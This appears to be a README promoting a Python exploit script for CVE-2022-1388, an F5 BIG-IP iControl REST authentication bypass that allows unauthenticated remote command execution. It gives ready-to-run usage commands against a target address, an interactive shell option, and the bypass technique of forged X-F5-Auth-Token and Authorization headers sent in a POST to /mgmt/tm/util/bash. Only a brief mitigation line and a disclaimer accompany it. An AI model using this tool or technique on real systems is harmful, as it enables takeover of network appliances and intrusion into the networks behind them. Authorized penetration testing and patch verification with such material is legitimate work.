CVE-2022-1388 – F5 BIG-IP iControl REST Authentication Bypass RCE This Python script exploits CVE-2022-1388, a critical vulnerability in F5 BIG-IP iControl REST that allows unauthenticated remote command execution via improper access control and HTTP header handling. ⚠️ For educational and authorized security research only. Do not use against systems you do not own or have explicit permission to test. Vulnerability Summary CVE ID: CVE-2022-1388 Vendor: F5 Networks Affected Product: BIG-IP (various versions) Impact: Remote attackers can bypass authentication and execute arbitrary system commands via crafted HTTP requests. Features Remote command execution via REST API Optional interactive shell (–shell) Custom HTTP basic authentication support SSL verification disabled (for self-signed certs) Usage bash python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>" Examples Run a Single Command bash python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id" Run with Custom Credentials bash python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami" Start Interactive Shell bash python3 cve_2022_1388_exploit.py -u https://192.168.1.1 –shell How It Works The script bypasses auth by setting a forged X-F5-Auth-Token and Authorization headers. Sends a POST request to: /mgmt/tm/util/bash Payload triggers execution of the specified shell command. Mitigation Upgrade to patched F5 BIG-IP versions as recommended by F5…Read More